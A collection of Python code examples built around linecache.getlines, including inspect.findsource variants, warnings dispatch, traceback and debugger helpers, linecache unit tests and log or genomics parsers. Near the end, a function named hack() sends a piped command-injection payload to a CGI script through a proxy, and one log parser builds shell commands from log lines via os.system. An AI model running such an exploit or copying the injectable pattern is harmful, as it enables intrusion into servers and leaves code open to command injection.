Beispiel #1
0
def findsource(object):
    """Return the entire source file and starting line number for an object.

    The argument may be a module, class, method, function, traceback, frame,
    or code object.  The source code is returned as a list of all the lines
    in the file and the line number indexes a line in that list.  An IOError
    is raised if the source code cannot be retrieved."""
    file = getsourcefile(object) or getfile(object)
    module = getmodule(object, file)
    if module:
        # Pass the module globals so linecache can fall back to
        # __loader__.get_source() for files not directly readable on disk.
        lines = linecache.getlines(file, module.__dict__)
    else:
        lines = linecache.getlines(file)
    if not lines:
        raise IOError('could not get source code')

    if ismodule(object):
        # A module's source starts at the top of the file.
        return lines, 0

    if isclass(object):
        name = object.__name__
        pat = re.compile(r'^(\s*)class\s*' + name + r'\b')
        # make some effort to find the best matching class definition:
        # use the one with the least indentation, which is the one
        # that's most probably not inside a function definition.
        candidates = []
        for i in range(len(lines)):
            match = pat.match(lines[i])
            if match:
                # if it's at toplevel, it's already the best one
                if lines[i][0] == 'c':
                    return lines, i
                # else add whitespace to candidate list
                candidates.append((match.group(1), i))
        if candidates:
            # this will sort by whitespace, and by line number,
            # less whitespace first
            candidates.sort()
            return lines, candidates[0][1]
        else:
            raise IOError('could not find class definition')

    # Reduce the remaining object kinds to the underlying code object.
    # (im_func / func_code are the Python 2 spellings of __func__/__code__.)
    if ismethod(object):
        object = object.im_func
    if isfunction(object):
        object = object.func_code
    if istraceback(object):
        object = object.tb_frame
    if isframe(object):
        object = object.f_code
    if iscode(object):
        if not hasattr(object, 'co_firstlineno'):
            raise IOError('could not find function definition')
        lnum = object.co_firstlineno - 1
        # Scan backwards for the def, lambda, or decorator line that
        # introduces this code object.
        pat = re.compile(r'^(\s*def\s)|(.*(?<!\w)lambda(:|\s))|^(\s*@)')
        while lnum > 0:
            if pat.match(lines[lnum]): break
            lnum = lnum - 1
        return lines, lnum
    raise IOError('could not find code object')
Beispiel #2
0
 def setUpClass(cls):
   """Prime the linecache with the Application and mock module sources.

   Loading the files up front means later linecache lookups still succeed
   while the builtin open is mocked out during the tests.
   """
   from ILCDIRAC.Interfaces.API.NewInterface import Application
   sources = [Application.__file__, mock_module.__file__]
   for path in sources:
     # Map compiled artifacts back to their .py source file.
     if path.endswith(('.pyc', '.pyo')):
       path = path[:-1]
     linecache.getlines(path)
Beispiel #3
0
 def test_lazycache_provide_after_failed_lookup(self):
     # A getlines() call with module globals records enough metadata that
     # lazycache() can later resolve the file through its loader, even
     # after the cache has been cleared and a plain lookup has failed.
     linecache.clearcache()
     lines = linecache.getlines(NONEXISTENT_FILENAME, globals())
     linecache.clearcache()
     linecache.getlines(NONEXISTENT_FILENAME)
     linecache.lazycache(NONEXISTENT_FILENAME, globals())
     # updatecache() must produce the same lines the lazy entry promised.
     self.assertEqual(lines, linecache.updatecache(NONEXISTENT_FILENAME))
Beispiel #4
0
    def makeGrammar(self, rules):
        """
        Produce a class from a collection of rules.

        @param rules: A mapping of names to rule bodies.
        """
        # Emit one "rule_<name>" method per rule; each method first builds a
        # locals dict and registers it on self.locals under the rule name.
        lines = list(itertools.chain(*[self._function(
            "def rule_%s(self):" % (name,),
            ["_locals = {'self': self}",
             "self.locals[%r] = _locals" % (name,)] + list(body)) + ['\n\n']
                                       for (name, body) in rules]))
        source = '\n'.join(self._suite(
            "class %s(%s):" %(self.name, self.superclass.__name__),
            lines))
        modname = "pymeta_grammar__"+self.name
        filename = "/pymeta_generated_code/"+modname+".py"
        # Build a synthetic module to host the generated grammar class.
        mod = module(modname)
        mod.__dict__.update(self.globals)
        mod.__name__ = modname
        mod.__dict__[self.superclass.__name__] = self.superclass
        # __loader__ lets linecache recover the generated source later.
        mod.__loader__ = GeneratedCodeLoader(source)
        code = compile(source, filename, "exec")
        eval(code, mod.__dict__)
        mod.__dict__[self.name].globals = self.globals
        sys.modules[modname] = mod
        # Prime linecache so tracebacks into generated code show source.
        linecache.getlines(filename, mod.__dict__)
        return mod.__dict__[self.name]
Beispiel #5
0
 def test_lazycache_smoke(self):
     # Looking up a missing file with module globals succeeds via the
     # loader; lazycache() on a cold cache must then report True.
     lines = linecache.getlines(NONEXISTENT_FILENAME, globals())
     linecache.clearcache()
     self.assertEqual(
         True, linecache.lazycache(NONEXISTENT_FILENAME, globals()))
     # A lazy cache entry is a 1-tuple holding only the loader callable.
     self.assertEqual(1, len(linecache.cache[NONEXISTENT_FILENAME]))
     # Note here that we're looking up a non existant filename with no
     # globals: this would error if the lazy value wasn't resolved.
     self.assertEqual(lines, linecache.getlines(NONEXISTENT_FILENAME))
Beispiel #6
0
def moduleFromGrammar(source, className, modname, filename):
    """Compile generated grammar source into a synthetic module.

    The module is registered in sys.modules and primed into linecache so
    tracebacks into the generated code can display source lines.
    NOTE(review): className is accepted but unused -- confirm with callers.
    """
    mod = module(modname)
    mod.__name__ = modname
    # The loader lets linecache fetch the in-memory source for `filename`.
    mod.__loader__ = GeneratedCodeLoader(source)
    code = compile(source, filename, "exec")
    eval(code, mod.__dict__)
    sys.modules[modname] = mod
    linecache.getlines(filename, mod.__dict__)
    return mod
Beispiel #7
0
def findsource(object):
    """Return the entire source file and starting line number for an object.

    The argument may be a module, class, method, function, traceback, frame,
    or code object.  The source code is returned as a list of all the lines
    in the file and the line number indexes a line in that list.  An IOError
    is raised if the source code cannot be retrieved."""
    file = getfile(object)
    sourcefile = getsourcefile(object)
    # Only pseudo-files such as '<stdin>' may pass without a real source
    # file; anything else without one is an error.
    if not sourcefile and file[:1] + file[-1:] != '<>':
        raise IOError('source code not available')
    file = sourcefile if sourcefile else file
    module = getmodule(object, file)
    if module:
        # Module globals let linecache consult __loader__.get_source().
        lines = linecache.getlines(file, module.__dict__)
    else:
        lines = linecache.getlines(file)
    if not lines:
        raise IOError('could not get source code')
    if ismodule(object):
        return (lines, 0)
    if isclass(object):
        name = object.__name__
        pat = re.compile('^(\\s*)class\\s*' + name + '\\b')
        # Prefer the least-indented match: most likely a top-level class
        # rather than one nested inside a function.
        candidates = []
        for i in range(len(lines)):
            match = pat.match(lines[i])
            if match:
                # A column-0 match is already top level -- it wins.
                if lines[i][0] == 'c':
                    return (lines, i)
                candidates.append((match.group(1), i))

        if candidates:
            # Sorts by leading whitespace, then by line number.
            candidates.sort()
            return (lines, candidates[0][1])
        raise IOError('could not find class definition')
    # Reduce to the code object (Python 2 attribute spellings).
    if ismethod(object):
        object = object.im_func
    if isfunction(object):
        object = object.func_code
    if istraceback(object):
        object = object.tb_frame
    if isframe(object):
        object = object.f_code
    if iscode(object):
        if not hasattr(object, 'co_firstlineno'):
            raise IOError('could not find function definition')
        lnum = object.co_firstlineno - 1
        # Walk backwards to the def/lambda/decorator line introducing it.
        pat = re.compile('^(\\s*def\\s)|(.*(?<!\\w)lambda(:|\\s))|^(\\s*@)')
        while lnum > 0:
            if pat.match(lines[lnum]):
                break
            lnum = lnum - 1

        return (lines, lnum)
    raise IOError('could not find code object')
Beispiel #8
0
def read_ld_so_conf():
    """Parse /etc/ld.so.conf, following its 'include' globs, and return
    the shared-library directories listed there."""
    def _strip(raw):
        # Trim whitespace, then drop blanks and '#' comment lines.
        trimmed = [entry.strip() for entry in raw]
        return [entry for entry in trimmed if entry != '' and entry[:1] != '#']
    entries = _strip(linecache.getlines('/etc/ld.so.conf'))
    dirs = [entry for entry in entries
            if entry != '' and not entry.startswith('include')]
    # 'include <glob>' lines pull in additional conf fragments.
    for entry in entries:
        if entry.startswith('include'):
            for fragment in glob.glob(entry.split()[1]):
                dirs.extend(_strip(linecache.getlines(fragment)))
    return dirs
def warn_explicit(message, category, filename, lineno, module=None, registry=None, module_globals=None):
    """Low-level warning dispatcher: match (message, category, module, line)
    against the `filters` list and carry out the first matching action.

    Bug fix: the body was mis-nested so that everything after the module
    derivation only ran when `module is None` and `filename` was falsy, the
    module name itself was computed wrongly ("<unknown>" assigned before the
    '.py' strip test), and `oncekey` could be referenced before assignment.
    Restored the canonical warnings.warn_explicit structure.
    """
    if module is None:
        # Derive the module name from the filename, dropping a .py suffix.
        module = filename or "<unknown>"
        if module[-3:].lower() == ".py":
            module = module[:-3]
    if registry is None:
        registry = {}
    if isinstance(message, Warning):
        # A Warning instance carries both the text and the category.
        text = str(message)
        category = message.__class__
    else:
        text = message
        message = category(message)
    key = (text, category, lineno)
    # Already issued from this exact location -- suppress.
    if registry.get(key):
        return
    # First matching filter decides the action; otherwise the default.
    for item in filters:
        action, msg, cat, mod, ln = item
        if (
            (msg is None or msg.match(text))
            and issubclass(category, cat)
            and (mod is None or mod.match(module))
            and (ln == 0 or lineno == ln)
        ):
            break
    else:
        action = defaultaction

    if action == "ignore":
        registry[key] = 1
        return
    # Prime the linecache so the warning display can show the source line.
    linecache.getlines(filename, module_globals)
    if action == "error":
        raise message
    if action == "once":
        registry[key] = 1
        oncekey = (text, category)
        if onceregistry.get(oncekey):
            return
        onceregistry[oncekey] = 1
    elif action == "always":
        pass
    elif action == "module":
        # Once per module: line number 0 serves as the per-module key.
        registry[key] = 1
        altkey = (text, category, 0)
        if registry.get(altkey):
            return
        registry[altkey] = 1
    elif action == "default":
        registry[key] = 1
    else:
        raise RuntimeError("Unrecognized action (%r) in warnings.filters:\n %s" % (action, item))
    showwarning(message, category, filename, lineno)
def get_lines_from_file(filename, lineno, context=0, globals=None):
    """Return `context` number of lines before and after the specified
    `lineno` from the (source code) file identified by `filename`.

    Returns a `(lines_before, line, lines_after)` tuple, with each line
    decoded via the file's PEP 263 coding cookie when one is present.
    Returns `((), None, ())` when `lineno` is out of range.
    """
    # The linecache module can load source code from eggs since Python 2.6.
    # Prior versions return lines from the wrong file, so we try locating
    # the file in eggs manually first.
    lines = []
    match = _egg_path_re.match(filename)
    if match:
        import zipfile
        for path in sys.path:
            try:
                zf = zipfile.ZipFile(path, 'r')
                try:
                    lines = zf.read(match.group(1)).splitlines()
                    break
                finally:
                    zf.close()
            except Exception:
                # Not a zip / member missing -- try the next sys.path entry.
                pass

    if not lines:
        import linecache
        linecache.checkcache(filename)
        if arity(linecache.getlines) >= 2:
            lines = linecache.getlines(filename, globals)
        else:   # Python 2.4
            lines = linecache.getlines(filename)

    if not 0 <= lineno < len(lines):
        return (), None, ()
    lbound = max(0, lineno - context)
    ubound = lineno + 1 + context

    # PEP 263: the coding cookie must appear on one of the first two lines.
    # (raw string: '\s'/'\w' in a plain literal is an invalid escape
    # sequence on modern Python)
    charset = None
    rep = re.compile(r'coding[=:]\s*([-\w.]+)')
    for linestr in lines[:2]:
        match = rep.search(linestr)
        if match:
            charset = match.group(1)
            break

    before = [to_unicode(l.rstrip('\n'), charset)
                 for l in lines[lbound:lineno]]
    line = to_unicode(lines[lineno].rstrip('\n'), charset)
    after = [to_unicode(l.rstrip('\n'), charset) \
                 for l in lines[lineno + 1:ubound]]

    return before, line, after
Beispiel #11
0
def warn_explicit(message, category, filename, lineno, module = None, registry = None, module_globals = None):
    """Low-level warning dispatcher: match (message, category, module, line)
    against the `filters` list and carry out the first matching action."""
    lineno = int(lineno)
    if module is None:
        # Derive the module name from the filename, dropping a .py suffix.
        module = filename or '<unknown>'
        if module[-3:].lower() == '.py':
            module = module[:-3]
    if registry is None:
        registry = {}
    if isinstance(message, Warning):
        # A Warning instance carries both the text and the category.
        text = str(message)
        category = message.__class__
    else:
        text = message
        message = category(message)
    key = (text, category, lineno)
    if registry.get(key):
        # Already issued from this exact location -- suppress.
        return
    else:
        # First matching filter decides the action; otherwise the default.
        for item in filters:
            action, msg, cat, mod, ln = item
            if (msg is None or msg.match(text)) and issubclass(category, cat) and (mod is None or mod.match(module)) and (ln == 0 or lineno == ln):
                break
        else:
            action = defaultaction

        if action == 'ignore':
            registry[key] = 1
            return
        # Prime linecache (with module globals) so the warning display can
        # show the offending source line.
        linecache.getlines(filename, module_globals)
        if action == 'error':
            raise message
        if action == 'once':
            registry[key] = 1
            oncekey = (text, category)
            if onceregistry.get(oncekey):
                return
            onceregistry[oncekey] = 1
        elif action == 'always':
            pass
        elif action == 'module':
            # Once per module: line number 0 serves as the per-module key.
            registry[key] = 1
            altkey = (text, category, 0)
            if registry.get(altkey):
                return
            registry[altkey] = 1
        elif action == 'default':
            registry[key] = 1
        else:
            raise RuntimeError('Unrecognized action (%r) in warnings.filters:\n %s' % (action, item))
        showwarning(message, category, filename, lineno)
        return
    def test_memoryerror(self):
        # A MemoryError inside updatecache() must not evict an existing
        # cache entry: the cached lines are still served.
        lines = linecache.getlines(FILENAME)
        self.assertTrue(lines)
        def raise_memoryerror(*args, **kwargs):
            raise MemoryError
        with support.swap_attr(linecache, 'updatecache', raise_memoryerror):
            lines2 = linecache.getlines(FILENAME)
        self.assertEqual(lines2, lines)

        # With a cold cache the failure surfaces as an empty result...
        linecache.clearcache()
        with support.swap_attr(linecache, 'updatecache', raise_memoryerror):
            lines3 = linecache.getlines(FILENAME)
        self.assertEqual(lines3, [])
        # ...and a later, unpatched lookup recovers the real lines.
        self.assertEqual(linecache.getlines(FILENAME), lines)
Beispiel #13
0
def eval(source, scope=jacklegScope, origin="__main"):
    """Compile and run Monte `source`, returning the value of its last line.

    NOTE(review): deliberately shadows the builtin eval; the builtin is
    used below under the name pyeval.
    """
    # Unique module name so repeated evals never collide in sys.modules.
    name = uuid.uuid4().hex + '.py'
    mod = module(name)
    mod.__name__ = name
    mod._m_outerScope = scope
    # Split off the final line so its value can be captured as the result.
    pysrc, _, lastline = ecompile(source, scope, origin).rpartition('\n')
    pysrc = '\n'.join(["from monte import runtime as _monte",
                       pysrc,
                       "_m_evalResult = " + lastline])
    mod.__loader__ = GeneratedCodeLoader(pysrc)
    code = compile(pysrc, name, "exec")
    pyeval(code, mod.__dict__)
    sys.modules[name] = mod
    # Prime linecache so tracebacks show the generated source.
    linecache.getlines(name, mod.__dict__)
    return mod._m_evalResult
Beispiel #14
0
def findsource(object):
    """Return (lines, lnum): the full source of the file defining `object`
    and the 0-based index of the line where its definition starts.

    Raises IOError when the source cannot be located.
    """
    file = getsourcefile(object)
    if not file:
        raise IOError('source code not available')
    module = getmodule(object, file)
    if module:
        # Module globals let linecache consult __loader__.get_source().
        lines = linecache.getlines(file, module.__dict__)
    else:
        lines = linecache.getlines(file)
    if not lines:
        raise IOError('could not get source code')
    if ismodule(object):
        return (lines, 0)
    if isclass(object):
        name = object.__name__
        pat = re.compile('^(\\s*)class\\s*' + name + '\\b')
        # Collect all matches; prefer the least indented (top-level) one.
        candidates = []
        for i in range(len(lines)):
            match = pat.match(lines[i])
            if match:
                if lines[i][0] == 'c':
                    # Column-0 match is already top level -- stop here.
                    return (lines, i)
                candidates.append((match.group(1), i))

        if candidates:
            # Sorts by leading whitespace, then by line number.
            candidates.sort()
            return (lines, candidates[0][1])
        raise IOError('could not find class definition')
    # Reduce to the code object (Python 2 attribute spellings).
    if ismethod(object):
        object = object.im_func
    if isfunction(object):
        object = object.func_code
    if istraceback(object):
        object = object.tb_frame
    if isframe(object):
        object = object.f_code
    if iscode(object):
        if not hasattr(object, 'co_firstlineno'):
            raise IOError('could not find function definition')
        lnum = object.co_firstlineno - 1
        # Scan backwards for the def/lambda/decorator line introducing it.
        pat = re.compile('^(\\s*def\\s)|(.*(?<!\\w)lambda(:|\\s))|^(\\s*@)')
        while lnum > 0:
            if pat.match(lines[lnum]):
                break
            lnum = lnum - 1

        return (lines, lnum)
    raise IOError('could not find code object')
Beispiel #15
0
def _fixed_getframes(etb, context=1, tb_offset=0):
    """Build traceback frame records for `etb` with `context` source lines
    each, skipping the first `tb_offset` records."""
    # Indices into an inspect frame-record tuple.
    LNUM_POS, LINES_POS, INDEX_POS = 2, 4, 5

    records = fix_frame_records_filenames(inspect.getinnerframes(etb, context))

    # If the error is at the console, don't build any context, since it would
    # otherwise produce 5 blank lines printed out (there is no file at the
    # console)
    rec_check = records[tb_offset:]
    try:
        rname = rec_check[0][1]
        if rname == '<ipython console>' or rname.endswith('<string>'):
            return rec_check
    except IndexError:
        pass

    aux = traceback.extract_tb(etb)
    assert len(records) == len(aux)
    for i, (file, lnum, _, _) in enumerate(aux):
        # Window of `context` lines centered on the error line.
        maybeStart = lnum - 1 - context // 2
        start = max(maybeStart, 0)
        end = start + context
        lines = linecache.getlines(file)[start:end]
        # pad with empty lines if necessary
        if maybeStart < 0:
            lines = (['\n'] * -maybeStart) + lines
        if len(lines) < context:
            lines += ['\n'] * (context - len(lines))
        buf = list(records[i])
        buf[LNUM_POS] = lnum
        buf[INDEX_POS] = lnum - 1 - start
        buf[LINES_POS] = lines
        records[i] = tuple(buf)
    return records[tb_offset:]
Beispiel #16
0
 def do_list(self, arg):
     """List source code around the current line.

     `arg` may be "first,last" (the second number is treated as a count
     relative to the first), a single line number, or '.' for the current
     frame's line.
     """
     self.lastcmd = 'list'
     last = None
     if arg and arg != '.':
         try:
             if ',' in arg:
                 (first, last) = arg.split(',')
                 first = int(first.strip())
                 last = int(last.strip())
                 # NOTE(review): the second value is always treated as a
                 # count here, unlike stdlib pdb which only does this when
                 # last < first -- confirm that this is intended.
                 last = first + last
             else:
                 first = int(arg.strip())
                 first = max(1, first - 5)
         except ValueError:
             self.error('Error in argument: %r' % arg)
             return
     elif self.lineno is None or arg == '.':
         first = max(1, self.curframe.f_lineno - 5)
     else:
         first = self.lineno + 1
     if last is None:
         last = first + 10
     filename = self.curframe.f_code.co_filename
     breaklist = self.get_file_breaks(filename)
     try:
         lines = linecache.getlines(filename, self.curframe.f_globals)
         self._print_lines(lines[first - 1:last], first, breaklist, self.curframe)
         self.lineno = min(last, len(lines))
         # Bug fix: this was `while len(lines) < last`, which printed
         # '[EOF]' forever whenever the listing ran past end of file.
         if len(lines) < last:
             self.message('[EOF]')
     except KeyboardInterrupt:
         pass
 def __init__( self, cachepath, logfile, capacity, debug=False ):
     """Initialize the cache manager.

     cachepath: directory holding the cache (joined to logfile with a
     Windows-style backslash separator); capacity: maximum cache size.
     NOTE(review): `debug` is accepted but never stored -- confirm intent.
     """
     self.cachepath = cachepath
     self.logfile = cachepath + '\\' + logfile
     self.capacity = capacity
     self.lines = linecache.getlines(self.logfile) # lines in logfile
     self.size, self.filecount = self.getSize()
     self.LRU = self.initLRU()
Beispiel #18
0
def get_lines_from_file(filename, lineno, context_lines,
                        loader=None, module_name=None):
    """
    Returns context_lines before and after lineno from file.
    Returns a (pre_context, context_line, post_context) triple, each passed
    through slim_string, or (None, None, None) when the source cannot be
    read or the line is missing.
    """
    # Prefer the loader's view of the source (works for zip/egg imports).
    source = None
    if loader is not None and hasattr(loader, "get_source"):
        try:
            source = loader.get_source(module_name)
        except (ImportError, IOError):
            # get_source can raise ImportError for modules the loader does
            # not own, e.g.:
            # Traceback (most recent call last):
            #   File "/Users/dcramer/Development/django-sentry/sentry/client/handlers.py", line 31, in emit
            #     get_client().create_from_record(record, request=request)
            #   File "/Users/dcramer/Development/django-sentry/sentry/client/base.py", line 325, in create_from_record
            #     data['__sentry__']['frames'] = varmap(shorten, get_stack_info(stack))
            #   File "/Users/dcramer/Development/django-sentry/sentry/utils/stacks.py", line 112, in get_stack_info
            #     pre_context_lineno, pre_context, context_line, post_context = get_lines_from_file(filename, lineno, 7, loader, module_name)
            #   File "/Users/dcramer/Development/django-sentry/sentry/utils/stacks.py", line 24, in get_lines_from_file
            #     source = loader.get_source(module_name)
            #   File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/pkgutil.py", line 287, in get_source
            #     fullname = self._fix_name(fullname)
            #   File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/pkgutil.py", line 262, in _fix_name
            #     "module %s" % (self.fullname, fullname))
            # ImportError: Loader for module cProfile cannot handle module __main__
            source = None
        if source is not None:
            source = source.splitlines()

    # Fall back to reading the file from disk via linecache.
    if source is None:
        try:
            source = linecache.getlines(filename)
        except (OSError, IOError):
            return None, None, None

    if not source:
        return None, None, None

    lower_bound = max(0, lineno - context_lines)
    upper_bound = min(lineno + 1 + context_lines, len(source))

    try:
        pre_context = [
            line.strip('\r\n')
            for line in source[lower_bound:lineno]
        ]
        context_line = source[lineno].strip('\r\n')
        post_context = [
            line.strip('\r\n')
            for line in source[(lineno + 1):upper_bound]
        ]
    except IndexError:
        # the file may have changed since it was loaded into memory
        return None, None, None

    return (
        slim_string(pre_context),
        slim_string(context_line),
        slim_string(post_context)
    )
Beispiel #19
0
def mea_file_unwrap(filename,sep_mark="  "):
	"""
	mea_file_unwrap(filename='Global2.mt0',sep_mark="  ")
	return (num_blk,len(blk_line))

	Unwrap a measurement file into a matrix written to <name>_<ext>.txt.
	Failed entries are substituted by the number -1.11.
	sep_mark: change this to ',' for a csv-like format.
	num_blk: number of blocks (for MC simulation).
	len(blk_line): number of measurements in each block.
	"""
	if not os.path.isfile(filename):
		print "%s not exist\n"%(filename)
		return 
	# Header layout from get_info: total line count plus the first and
	# last line of the header section.
	tot_lines,line_info0, line_info1,=get_info(filename)
	f=linecache.getlines(filename)
	outfilename='./'+filename.replace('.','_')+'.txt'
	fhout=open(outfilename,'w')
	# Python 2 integer division: complete data blocks after the header.
	num_blk=(tot_lines-line_info1-1)/(line_info1-line_info0+1)
	num_blk_line=line_info1-line_info0+1
	for blkct in xrange(num_blk):
		blk_line=[]
		for blk_line_ct in xrange(num_blk_line):
			current_line_pt=line_info1+1+num_blk_line*blkct+blk_line_ct
			# Replace unparseable entries with a numeric sentinel.
			current_line=f[current_line_pt].replace("failed", "-1.11")
			current_line_list=current_line.split()
			blk_line=blk_line+current_line_list
		fhout.write(sep_mark.join(blk_line)+"\n")
	fhout.close()
	print "%s: num_blk %d;\t Num_entry %d;\t Blk_line %d"\
	%(filename,num_blk,len(blk_line),num_blk_line)
	return (num_blk,len(blk_line))
def show_results(prof, stream=None, precision=1):
    """Write a per-line memory-usage report for `prof` to `stream`
    (default sys.stdout), with `precision` decimal places for MiB values."""
    if stream is None:
        stream = sys.stdout
    template = '{0:>6} {1:>12} {2:>12}   {3:<}'

    for (filename, lines) in prof.code_map.items():
        header = template.format('Line #', 'Mem usage', 'Increment',
                                 'Line Contents')

        stream.write(u'Filename: ' + filename + '\n\n')
        stream.write(header + u'\n')
        stream.write(u'=' * len(header) + '\n')

        # Source text used to annotate each measured line.
        all_lines = linecache.getlines(filename)
        mem_old = None
        float_format = u'{0}.{1}f'.format(precision + 4, precision)
        template_mem = u'{0:' + float_format + '} MiB'
        for (lineno, mem) in lines:
            if mem:
                # Increment is relative to the previous measured line.
                inc = (mem - mem_old) if mem_old else 0
                mem_old = mem
                mem = template_mem.format(mem)
                inc = template_mem.format(inc)
            else:
                mem = u''
                inc = u''
            tmp = template.format(lineno, mem, inc, all_lines[lineno - 1])
            stream.write(unicode(tmp))
        stream.write(u'\n\n')
def catch_err(filename):
    """Scan today's catalina log for ERROR entries, starting at the cursor
    stored in /home/catalina/record.txt, and append them (plus their
    continuation lines) to today's error log.

    `filename` is a sequence of (catalina_log_name, errlog_name).
    Returns (errlog mtime, updated cursor line number).
    """
    today_catalina = list(filename)[0]
    today_errlog = list(filename)[1]
    # Bug fix: the record file was opened but never closed.
    with open('/home/catalina/record.txt', 'r') as f1:
        content1 = f1.read()
    # Cursor format: "<field>,<line-number>"; 0 means start at line 1.
    cursor = int(content1.split(',')[1])
    if cursor == 0:
        start_line = 1
    else:
        start_line = cursor
    infos = linecache.getlines('/home/catalina/%s' % today_catalina)[start_line:]
    errlog_path = '/home/catalina/%s' % today_errlog
    if not os.path.isfile(errlog_path):
        os.system('touch %s' % errlog_path)
    x = 1
    for info in infos:
        error = re.search('ERROR', info)
        if error:
            # SECURITY: log content is interpolated into a shell command;
            # a line containing shell metacharacters could execute code.
            # Consider appending with open(errlog_path, 'a') instead.
            cmd1 = '''echo "%s" >> %s''' % (info, errlog_path)
            os.system(cmd1)
            # Lines without an HH:MM:SS timestamp are continuations of the
            # same error; copy them until the next timestamped line.
            for err_info in infos[x:]:
                if not re.search(r'\b\d\d:\d\d:\d\d\b', err_info):
                    cmd2 = '''echo "%s" >> %s''' % (err_info, errlog_path)
                    os.system(cmd2)
                else:
                    cmd3 = "echo '\n----------------------------------------------------------------------------------------------------------------------------------------------------------------\n' >> %s" % errlog_path
                    os.system(cmd3)
                    break
        x = x + 1
        start_line = start_line + 1
    time = os.stat('%s' % errlog_path).st_mtime
    return (time, start_line)
Beispiel #22
0
def renderTraceback(trace):
    """Format a list of traceback-frame dicts into a Python-style
    traceback string, one 'File ...' line (plus source line when
    available) per frame."""
    formatted = []

    for frame in trace:
        rawPath = frame["path"]
        if isinstance(rawPath, tuple):
            # Tuple paths name pyfora modules; others carry the path first.
            if rawPath[0] == "ModuleImporter":
                path = os.path.join(_pyforaRoot, *rawPath[1:]) + ".fora"
            else:
                path = rawPath[0]
        else:
            path = os.path.abspath(rawPath)

        # Prefer the structured range when present.
        if 'range' in frame:
            lineNumber = frame['range']['start']['line']
        else:
            lineNumber = frame["line"]

        formatted.append('  File "%s", line %s' % (path, lineNumber))

        # Append the stripped source line when the file is readable.
        lines = linecache.getlines(os.path.abspath(path))
        if lines is not None and 1 <= lineNumber <= len(lines):
            formatted.append("    " + lines[lineNumber - 1][:-1].lstrip())

    return "\n".join(formatted)
Beispiel #23
0
def add_genotype_from_vcf_to_annovar(vcf_f, anno_f, new_f, sample_file):
    """Merge per-sample genotype columns from VCF file `vcf_f` into the
    annovar annotation table `anno_f`, writing the result to `new_f`.

    `sample_file` defines case/control sample groups for the appended
    allele-frequency columns.
    """
    anno_d, anno_title = get_anno(anno_f)
    nf = open(new_f, 'w')
    print 'get anno info'
    sg = data.SampleGroup(sample_file)
    cases = sg.cases_id
    ctrls = sg.ctrls_id
    if os.path.exists(vcf_f):
        cache_data = linecache.getlines(vcf_f)
        print 'get vcf info'
        for line in range(1, len(cache_data)):
            # '##' lines are VCF meta headers; skip them.
            if cache_data[line][:2] == '##':
                continue
            elif cache_data[line][0] == '#':
                # '#CHROM' header row: build the combined output header.
                vcf_title = cache_data[line].strip().split('\t')[8:] + ['allele_count', 'sample_count', 'allele_freq']
                ntl = anno_title.strip().split('\t') + vcf_title
                nt = '\t'.join(ntl) + '\n'
                nf.write(nt)
                continue
            ll = cache_data[line].strip().split('\t')
            # (chrom, pos, id, ref, alt) keys the annotation lookup.
            key = tuple(ll[:5])
            if key in anno_d:
                nl = anno_d[key]+ll[8:]+count_alle_freq(sample_info=ll[9:], sample_id=vcf_title[1:-3], cases=cases, ctrls=ctrls)
                nf.write('\t'.join(nl)+'\n')
        return
    else:
        print('the path [{}] is not exist!'.format(vcf_f))
Beispiel #24
0
def generateFnameLableTuppleList(inputListName, labelre, labelfunc=None, limit=-1, ifshuffle=True):
    """Read filenames from the list file `inputListName` and pair each with
    a numeric label index extracted via regex `labelre` (first group).

    labelfunc: optional transform applied to the raw label string before it
        is registered.  Bug fix: previously the membership test used the
        raw label while the stored value was transformed, so the same raw
        label was appended to labelList repeatedly.
    limit: keep only the first `limit` entries (-1 means no limit).
    ifshuffle: shuffle the resulting collection in place.

    Returns (collection, labelList): collection is a list of
    (stripped filename, label index) tuples; labelList holds the distinct
    labels in first-seen order.
    """
    labelList = []  # distinct labels, in first-seen order (for saving)

    flist = getlines(inputListName)
    if len(flist) == 0:
        raise Exception('flist is empty')
    if limit != -1:
        flist = flist[0:limit]

    collection = []

    for subfname in flist:
        label = re.match(labelre, subfname).groups()[0]
        # Normalize first so the duplicate check sees the stored form.
        if labelfunc is not None:
            label = labelfunc(label)
        if label not in labelList:
            labelList.append(label)
        collection.append((subfname.strip(), labelList.index(label)))

    if ifshuffle:
        np.random.shuffle(collection)
    return collection, labelList
Beispiel #25
0
 def test_lazycache_already_cached(self):
     # lazycache() must refuse to replace a fully populated cache entry
     # and report False.
     linecache.clearcache()
     lines = linecache.getlines(NONEXISTENT_FILENAME, globals())
     self.assertEqual(
         False,
         linecache.lazycache(NONEXISTENT_FILENAME, globals()))
     # A full cache entry is the 4-tuple (size, mtime, lines, fullname).
     self.assertEqual(4, len(linecache.cache[NONEXISTENT_FILENAME]))
Beispiel #26
0
def _fixed_getinnerframes(etb, context=1, tb_offset=0):
    """Build traceback frame records for `etb` with `context` source lines
    each, skipping the first `tb_offset` records."""
    import linecache

    # Indices into an inspect frame-record tuple.
    LNUM_POS, LINES_POS, INDEX_POS = 2, 4, 5

    records = fix_frame_records_filenames(inspect.getinnerframes(etb, context))

    # If the error is at the console, don't build any context, since it would
    # otherwise produce 5 blank lines printed out (there is no file at the
    # console)
    rec_check = records[tb_offset:]
    try:
        rname = rec_check[0][1]
        if rname == "<ipython console>" or rname.endswith("<string>"):
            return rec_check
    except IndexError:
        pass

    aux = traceback.extract_tb(etb)
    assert len(records) == len(aux)
    for i, (file, lnum, _, _) in zip(range(len(records)), aux):
        # Window of `context` lines centered on the error line.
        maybeStart = lnum - 1 - context // 2
        start = max(maybeStart, 0)
        end = start + context
        lines = linecache.getlines(file)[start:end]
        buf = list(records[i])
        buf[LNUM_POS] = lnum
        buf[INDEX_POS] = lnum - 1 - start
        buf[LINES_POS] = lines
        records[i] = tuple(buf)
    return records[tb_offset:]
Beispiel #27
0
def hack():
  """Proof-of-concept exploit: fetches includer.cgi through a user-supplied
  HTTP proxy with a piped command and prints the cleaned response body.

  NOTE(review): relies on module-level `host` and `send`; Python 2 only.
  """
  print "[X] Connecting..."
  proxer = raw_input("Type your proxy (IP:PORT) here: ")
  proxy = {'http': 'http://' + proxer} # PROXY !!! (find here: http://www.aliveproxy.com/high-anonymity-proxy-list)
  print "[X] Proxing...",
  url = urllib.FancyURLopener(proxy)
  print "[OK]"
  print "[X] Sending exploit...",
  stack = url.open(host + "includer.cgi?=|" + send + "|")
  read = stack.read()
  print "[OK]"
  print "[X] Exploited !\n"
  # Round-trip the response through temp.txt so linecache can split it.
  t_file = open('temp.txt', 'w')
  print >> t_file, read
